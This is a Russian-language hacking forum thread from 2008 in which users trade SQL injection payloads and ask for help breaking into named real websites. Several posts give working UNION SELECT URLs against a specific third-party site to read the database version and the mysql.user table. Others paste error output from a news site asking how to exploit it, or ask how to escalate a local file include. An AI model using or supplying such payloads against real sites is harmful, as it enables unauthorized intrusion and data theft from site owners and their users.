HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3991  
Старый 02.12.2008, 21:26
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами: 9387494

Репутация: 36
По умолчанию

Да с синтаксис SQL я знаю неоч! Но факт остается фактом! Этот вариант прокатывает во многих случаях!!!
 
Ответить с цитированием

  #3992  
Старый 02.12.2008, 21:27
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Цитата:
Сообщение от BanQui  
Хммм в большенстве случаев этот вариант прокатывает!!!
Гениально! Главное сказать и не важно что не правильно.
Оператор order by сортирует результат запроса, а отсортировывать пустой результат (а со значением -1 другого и не будет) - не самая лучшая идея.
Использовать order by нужно только при существующих значениях.

Ошибка в данном случае была в использование /* - в новых версиях мускула нельзя не закрывать этот комментарий, а значит теперь обходимся комментариями '#' и '-- '.
 
Ответить с цитированием

  #3993  
Старый 02.12.2008, 21:37
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами: 9574565

Репутация: 712


По умолчанию

Чего опять ему надо ?((

http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,version( ),3,4--
(безрезультатно()

serverstats.php?serverid=1+union+select+1,column_n ame,3,4+from+information_schema.columns.--
тоже /=

serverstats.php?serverid=1+union+select+1,column_n ame,3,4+from+information_schema.columns.+limit+1,1--

даже версию не посмотреть(
 
Ответить с цитированием

  #3994  
Старый 02.12.2008, 21:41
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

mysql error: The used SELECT statements have a different number of columns

читай Сначала кол-во колонок подбери
 
Ответить с цитированием

  #3995  
Старый 02.12.2008, 21:57
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами: 9387494

Репутация: 36
По умолчанию

Блин на мой вопрос с ПХП кто нибуть ответит??? Если кто не видел вот он :
Цитата:
Сообщение от BanQui  
Такой вопрос! Если есть сайт и на нем присутствует локальный инклуд! Как можно его раскрутить если на сайт загрузить ничего нельзя(ну по крайней мере такой функции нет в меню на сайта)!? Может есть какие-то пути? Или это просто нашел да и х*р с ним!?
------------------------------------
Цитата:
Сообщение от -m0rgan-  
Почитай здесь:
http://forum.antichat.ru/thread12123.html
Я там не понял как именно добавлять файл! Читал раз 5!!! Как китайский блин!!!
 
Ответить с цитированием

  #3996  
Старый 03.12.2008, 01:58
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

geforse
помоему 2 и 3 принтабельные.. но вывода не увидел, логический вывод:

Цитата:
http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,unhex(he x(version())),3,4+from+information_schema.tables--
5 ветка..
Цитата:
http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,unhex(he x(version())),3,4+from+mysql.user--
с правами
 
Ответить с цитированием

  #3997  
Старый 03.12.2008, 05:14
Sanic1977
Новичок
Регистрация: 29.10.2008
Сообщений: 1
С нами: 9228480

Репутация: 0
По умолчанию

как раскрутить?

http://www.ushkalenko.ru/guestbook/index.php?mz_module=guestbook&mz_page=-1
 
Ответить с цитированием

  #3998  
Старый 03.12.2008, 08:24
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

Sanic1977
никак нема иьекта )
 
Ответить с цитированием

  #3999  
Старый 03.12.2008, 08:30
Ghost0ff
Новичок
Регистрация: 18.11.2008
Сообщений: 28
С нами: 9198543

Репутация: 15
По умолчанию

Цитата:
http://www.ushkalenko.ru/guestbook/index.php?mz_module=guestbook&mz_page=-1
инъект отсутствует
 
Ответить с цитированием

  #4000  
Старый 03.12.2008, 22:24
zenon2
Новичок
Регистрация: 25.10.2006
Сообщений: 10
С нами: 10285880

Репутация: 1
По умолчанию

http://www.comingsoon.net/news.php?id=1'

Получил вот такой ответ

Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'

Есть ли тут injection? Если есть пожалуйста помогите раскрутить а то чет никак не могу понять как запросик зделать.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.